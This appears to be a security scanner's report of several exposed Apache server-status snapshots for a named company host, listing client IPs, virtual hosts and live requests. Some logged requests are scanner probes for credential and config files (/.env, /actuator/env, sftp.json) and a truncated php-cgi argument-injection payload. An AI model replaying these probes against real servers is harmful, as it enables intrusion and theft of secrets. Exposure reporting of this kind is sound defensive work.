18.8700161891540.015.371128.49 3.8.77.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /phpinfo.php.backup HTTP/1.1 3-30429844910/226/36403_ 18.870783182174840.05.501214.04 172.71.164.82h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-30429844910/227/36386_ 18.8600263439080.04.151149.57 3.8.77.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /test.php.orig HTTP/1.1 3-30429844910/271/35785_ 18.8600807674360.025.391125.72 3.8.77.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /phpinfo.php.backup HTTP/1.1 3-30429844910/243/36872_ 18.8600305608200.010.571193.36 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-30429844920/321/32035_ 19.951371296450840.08.601013.91 162.158.120.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-30429844920/252/32207_ 19.94118136688360.07.561116.63 91.204.127.221http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-30429844920/248/32274_ 20.0310138372420.018.481118.98 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 4-30429844920/338/32626_ 19.58398154530780.07.45975.08 162.158.122.47h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-30429844920/289/32090_ 19.94021157441220.05.071014.83 31.222.123.131h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8d2388cc4
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 04-Nov-2025 07:06:47 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 282 Parent Server MPM Generation: 281 Server uptime: 52 days 18 hours 45 minutes 44 seconds Server load: 0.30 0.25 0.16 Total accesses: 1650947 - Total Traffic: 51.1 GB - Total Duration: 821878570 CPU Usage: u222.27 s218.19 cu9003.74 cs5050.42 - .318% CPU load .362 requests/sec - 11.7 kB/second - 32.4 kB/request - 497.823 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02744779no0yes010000 12744940no0yes010000 22744777no0yes19000 32744778no0yes010000 42744780no0yes010000 Sum500 149000 ____________________________W_____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-28127447790/211/32071_ 27.05263574259473460.018.351160.75 172.70.255.82h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28127447790/196/31504_ 26.77109415150582140.03.511087.67 172.69.155.213h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-28127447790/236/31887_ 25.91257439129706420.046.151105.09 146.70.52.221http/1.1 0-28127447790/200/31905_ 26.191089383142286070.024.531124.15 172.71.211.16h2tandemsl.com:443done, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-28127447790/196/32054_ 26.771094142129419630.05.201037.52 172.69.155.213h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28127447790/197/32330_ 26.071089471150970720.03.051128.79 172.70.208.139h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28127447790/195/32181_ 26.662581206156510.09.991006.54 162.158.123.125h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-28127447790/176/31666_ 26.77109414128770160.02.721049.15 172.69.155.213h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-28127447790/196/32052_ 26.77109429141005460.02.761050.50 172.69.155.213h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-28127447790/210/31904_ 26.08258449167292970.011.341134.27 172.70.189.49h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28127449400/356/36669_ 33.211600424152353870.06.721103.38 172.69.39.139h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28127449400/400/37260_ 34.24294428189909990.09.241185.98 172.68.164.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28127449400/359/36936_ 33.8016051178964850.06.691121.29 172.69.6.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28127449400/350/36781_ 33.05289570171539980.08.751066.99 172.71.102.188h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28127449400/340/37546_ 33.391600409154040530.06.951161.52 162.158.106.90h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28127449400/293/38150_ 33.8514440163971730.04.241118.28 188.114.111.233h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28127449400/316/37242_ 33.381439403202578330.06.551101.44 172.69.138.94h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28127449400/354/37953_ 33.38289500152649400.010.121078.15 172.69.11.245h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28127449400/353/36123_ 33.6714390152194330.07.471000.67 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-28127449400/380/37475_ 33.301444462144430380.06.701020.59 172.70.82.205h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-28127447770/438/30827_ 40.761482154282430.010.39845.45 172.71.11.19h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-28127447770/436/30006_ 40.9410188007840.012.17868.17 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-28127447770/430/30872_ 40.921340219123740.08.02925.52 172.68.10.12h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-28127447770/467/29990_ 40.771432144470010.022.04863.68 86.127.229.70http/1.1 2-28127447770/470/30422_ 40.9410116117000.016.001110.51 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-28127447770/482/30626_ 40.9500127505860.07.97889.30 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-28127447770/465/30474_ 40.9410129244990.033.41924.85 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-28127447770/453/30387_ 40.9500142332470.022.93910.85 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-28127447770/462/30693W 40.9400131402310.025.26974.82 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-28127447770/455/30509_ 40.801448164527000.09.86953.44 172.68.10.12h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28127447780/791/35096_ 50.6300217488620.015.061112.11 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-28127447780/766/33932_ 50.6100168303180.022.421017.85 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-28127447780/741/34751_ 50.6100175621400.013.711131.62 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-28127447780/772/34238_ 50.6300221240560.016.241147.22 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-28127447780/743/34173_ 50.5301191148494280.016.561054.70 162.158.227.143h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28127447780/768/34210_ 50.56024153437900.013.171071.78 104.22.7.96h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-28127447780/804/34538_ 50.6300125996710.017.001183.63 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-28127447780/778/34565_ 50.6100252539740.015.311118.94 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-28127447780/816/33948_ 50.6100169635160.026.081064.90 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-28127447780/795/35064_ 50.6100176323610.019.431119.83 64.227.70.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 4-28127447800/187/30915_ 23.821444434282977570.06.11986.41 172.70.236.138h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-28127447800/174/31156_ 23.891439451130397730.04.211067.44 172.70.142.209h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-28127447800/190/31212_ 23.92304663131852550.02.991068.91 172.69.39.139h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-28127447800/177/31458_ 24.4614441143950220.01.83943.92 162.158.123.42h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-28127447800/172/30945_ 24.2819910147886100.0</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc83f299909
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 02-Nov-2025 10:24:21 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 273 Parent Server MPM Generation: 272 Server uptime: 50 days 22 hours 3 minutes 18 seconds Server load: 0.45 0.26 0.17 Total accesses: 1602519 - Total Traffic: 49.5 GB - Total Duration: 794026865 CPU Usage: u137.62 s170.78 cu8775.55 cs4918.78 - .318% CPU load .364 requests/sec - 11.8 kB/second - 32.4 kB/request - 495.487 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02609880no0yes19000 12610065no0yes010000 22609877no0yes010000 32609878no0yes010000 42609879no0yes010000 Sum500 149000 _W________________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-27226098800/197/31105_ 14.7320248915100.04.751115.76 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-27226098800/212/30581W 14.7300147385260.02.971063.88 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-27226098800/194/30911_ 14.7310126123830.02.711043.49 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-27226098800/191/30867_ 14.59316138373090.03.661033.85 104.22.7.170h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/203/31046_ 14.7401125764090.03.061010.48 172.69.7.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/193/31351_ 14.67221147187080.04.151106.21 162.158.123.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/190/31248_ 14.7300200635750.015.39963.68 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-27226098800/202/30762_ 14.69015125633210.03.57999.63 162.158.120.156h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/211/31059_ 14.38318137646550.05.251016.75 104.194.147.43h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-27226098800/211/30935_ 14.7330163725450.04.361091.06 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-27226100650/334/35460_ 17.3800143672560.019.891070.39 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-27226100650/314/35983_ 17.3830177259590.02.491130.74 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-27226100650/317/35695_ 17.2701168921620.03.891071.62 43.159.138.217http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-27226100650/316/35496_ 17.3810165624340.04.251037.27 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-27226100650/337/36341_ 17.320556149450120.05.111127.58 104.23.166.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27226100650/323/36975_ 17.3840156248140.011.851067.48 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 1-27226100650/334/36041_ 17.0540184187510.03.661078.19 5.181.27.149h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-27226100650/329/36719_ 17.3810145204730.04.401048.20 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-27226100650/331/34944_ 17.343534147109400.05.54954.23 162.158.172.78h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-27226100650/328/36227_ 17.3820139201190.03.82994.22 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-27226098770/4/29359_ 6.9817875147140770.00.55808.18 172.71.172.30h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/10/28600_ 6.8217820174264250.00.48831.95 188.114.111.27h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/4/29463_ 6.8217820208046450.00.06893.76 188.114.111.208h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/8/28622_ 6.8417820137969450.01.32817.25 188.114.111.95h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/8/28992_ 6.9817810107129960.00.061069.80 162.158.110.247h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/8/29149_ 6.451787596119826960.00.73849.98 172.70.174.94h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/7/29051_ 5.8417812117275490.00.12854.49 162.158.42.99h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/3/28938_ 2.7617820133927230.00.01860.06 104.23.202.102h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/9/29288_ 6.9817860118167480.00.29926.65 172.71.148.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/7/29055_ 7.5620152909500.00.87892.73 206.81.12.187http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-27226098780/9/34177_ 4.9217820214373860.00.141091.13 172.69.22.184h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/13/33037_ 7.4221720165126550.01.53990.55 162.158.123.167h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/6/33889_ 5.5917871056172486320.00.281115.71 162.158.154.246h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/10/33352_ 7.0817810218000250.00.151126.88 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/14/33308_ 7.5217870140361150.00.161034.06 172.70.248.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/9/33319_ 7.0817820150437710.00.361055.14 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/10/33612_ 7.3921670122659230.00.151164.13 188.114.111.94h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/9/33663_ 7.5217860249300240.00.191099.03 172.70.243.46h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/11/33033_ 6.3717811166358200.00.091037.74 172.68.22.45h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/6/34166_ 4.91216710172819290.00.061098.02 172.69.134.63h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/17/30595_ 5.601782803281886550.00.16975.69 162.158.158.239h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-27226098790/16/30796_ 7.2617820129518450.00.101045.65 188.114.111.67h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/17/30853_ 7.401782371130259780.00.141060.53 172.70.108.241h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/19/31141_ 7.4217820142789870.07.42938.64 172.71.164.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/23/30628_ 7.42178601469
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc845787221
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 01-Nov-2025 07:33:29 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 266 Parent Server MPM Generation: 265 Server uptime: 49 days 19 hours 12 minutes 26 seconds Server load: 0.36 0.37 0.22 Total accesses: 1582679 - Total Traffic: 49.0 GB - Total Duration: 771120317 CPU Usage: u114.76 s153.42 cu8658.58 cs4835.57 - .32% CPU load .368 requests/sec - 11.9 kB/second - 32.5 kB/request - 487.225 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02408286no2yes010001 12408285no2yes28011 22408284no0yes010000 32408417no1yes010010 42408287no0yes010000 Sum505 248022 _____________W_____R______________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-26524082860/60/30409_ 4.554285245972220.01.351103.69 172.70.215.43h2tandemsl.com:443idle, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 0-26524082860/52/29895_ 4.7120144400090.00.991051.58 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-26524082860/53/30243_ 4.53437313123214310.00.661032.74 172.70.215.43h2tandemsl.com:443done, streams: 0/14/14/0/0 (open/recv/resp/push/rst) 0-26524082860/50/30208_ 4.5462135367720.00.681018.36 172.70.215.43h2tandemsl.com:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 0-26524082860/63/30353_ 4.561322122604890.02.43995.74 172.70.215.43h2tandemsl.com:443idle, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 0-26524082860/54/30663_ 4.561331143869180.03.571091.86 172.70.215.43h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-26524082860/47/30523_ 4.57442331151780120.01.20930.84 172.70.215.43h2tandemsl.com:443idle, streams: 0/14/14/0/0 (open/recv/resp/push/rst) 0-26524082860/52/30054_ 4.7160122309520.00.96985.23 104.23.211.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-26524082860/62/30375_ 4.54437449134421010.01.52989.58 172.70.215.43h2tandemsl.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 0-26524082860/57/30234_ 4.7140160012040.00.901076.51 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-26524082850/35/34666_ 3.712159140643960.00.441043.33 172.71.191.94h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-26524082850/38/35212_ 3.7320170254130.00.491119.81 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-26524082850/36/34904_ 3.7300164211690.00.411057.45 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-26524082850/33/34738W 3.7200152211920.00.391024.88 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-26524082850/35/35545_ 3.7300145050950.00.331114.02 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-26524082850/44/36175_ 3.7300152344580.00.901047.44 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-26524082850/36/35247_ 3.7220178315870.00.131065.80 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 1-26524082850/35/35930_ 3.7330141723030.01.051008.16 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-26524082850/36/34150_ 3.7200141494370.013.41940.48 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 1-26524082850/34/35421R 3.7300133343350.00.45982.67 162.158.90.7h2tandemsl.com:443GET /ans.php HTTP/2.0 2-26524082840/10/29327_ 3.0520147032220.00.09807.30 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-26524082840/9/28553_ 2.8821138156820.00.08830.16 172.69.214.118h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/7/29431_ 2.8550207911010.00.01893.15 172.70.50.38h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/6/28582_ 2.874670137891410.00.05814.31 172.70.50.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/3/28958_ 3.0550107018590.00.001055.76 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 2-26524082840/5/29114_ 2.854670119748450.00.10848.42 108.162.241.84h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/2/29019_ 0.887555117206780.00.03851.98 162.158.79.143h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/5/28906_ 2.864670133838270.00.02858.91 172.69.130.170h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-26524082840/5/29247_ 3.0581118075170.00.25925.36 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-26524082840/6/29014_ 2.854670152817490.00.04889.95 172.70.50.60h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-26524084170/73/34043_ 5.5750198665450.01.391087.05 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 3-26524084170/76/32911_ 5.5650164664880.01.28985.48 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-26524084170/75/33777_ 5.5900165536350.01.241111.38 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-26524084170/85/33215_ 5.566315217465330.02.091110.09 172.70.215.113h2tandemsl.com:443idle, streams: 0/63/63/0/0 (open/recv/resp/push/rst) 3-26524084170/74/33165_ 5.5910139766490.03.101030.01 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-26524084170/65/33191_ 5.582350145688150.01.281051.17 172.70.215.113h2tandemsl.com:443idle, streams: 0/66/66/0/0 (open/recv/resp/push/rst) 3-26524084170/76/33475_ 5.505301119226500.01.811160.06 172.70.215.113h2tandemsl.com:443idle, streams: 0/52/52/0/0 (open/recv/resp/push/rst) 3-26524084170/78/33533_ 5.5910244844480.01.751096.34 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-26524084170/73/32906_ 5.5750165842610.01.891033.68 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 3-26524084170/92/34055_ 5.5910172393040.01.481094.91 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-26524082870/4/30247_ 2.4860280326550.00.01955.14 172.68.134.15h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-26524082870/3/30457_ 0.3170127857270.00.001038.50 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 4-26524082870/6/30529_ 2.8670128805640.00.101052.72 134.122.28.88http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 4-26524082870/6/30800_ 2.691590141198030.00.03923.73 108.162.242.112h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-26524082870/3/30269_ 2.691590145323210.00.09965.62 172.69.130.130h2tandemsl.com:443done
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc87a48ecd7
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 01-Nov-2025 05:04:33 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 266 Parent Server MPM Generation: 265 Server uptime: 49 days 16 hours 43 minutes 30 seconds Server load: 0.21 0.14 0.09 Total accesses: 1581031 - Total Traffic: 49.0 GB - Total Duration: 770618883 CPU Usage: u103.72 s144.15 cu8658.58 cs4835.57 - .32% CPU load .368 requests/sec - 12.0 kB/second - 32.5 kB/request - 487.415 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02408286no7yes28004 12408285no0yes010000 22408284no2yes010000 32408417no17yes0100015 42408287no1yes010000 Sum5027 2480019 ___WR_____________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-26524082860/5/30354_ 0.0400245821530.00.011102.35 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-26524082860/3/29846_ 0.0500144256030.00.001050.60 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-26524082860/4/30194_ 0.0500123125400.00.001032.09 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-26524082860/7/30165W 0.0500135227410.00.011017.69 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-26524082860/8/30298R 0.0500122512140.00.01993.32 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 0-26524082860/6/30615_ 0.0400143721780.00.011088.29 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-26524082860/2/30478_ 0.0500151682000.00.00929.64 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET 